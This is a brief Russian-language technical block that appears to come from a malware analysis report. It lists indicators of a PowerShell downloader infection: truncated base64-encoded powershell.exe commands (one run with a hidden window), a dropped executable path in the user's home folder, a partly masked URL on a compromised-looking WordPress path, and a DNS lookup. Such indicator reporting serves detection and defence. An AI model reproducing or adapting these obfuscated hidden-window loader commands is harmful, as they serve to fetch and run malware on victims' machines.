Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -en JABGAGYAegByADQANwBmAD0AKAAnAEgAJwArACgAJwAzAGQAeQByACcAKwAnAGkAcgAnACkAKQA7AC4AKAAnAG4AZQB3ACcAKwAnAC0AaQAnACsAJwB0AGUAbQAnACkAIAAkAEUAbgB2ADoAdQBzAEUAUgBwAFIAbwBGAGkAbABFAFwAUgA0AGUANABTA...
- %HOMEPATH%\r4e4spq\b6q4hq_\gq_enxi3g.exe
- http://yd##in.fun/wp-includes/J2gtP7rvBA/
- DNS ASK yd##in.fun
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -en JABGAGYAegByADQANwBmAD0AKAAnAEgAJwArACgAJwAzAGQAeQByACcAKwAnAGkAcgAnACkAKQA7AC4AKAAnAG4AZQB3ACcAKwAnAC0AaQAnACsAJwB0AGUAbQAnACkAIAAkAEUAbgB2ADoAdQBzAEUAUgBwAFIAbwBGAGkAbABFAFwAUgA0AGUANABTA...' (со скрытым окном)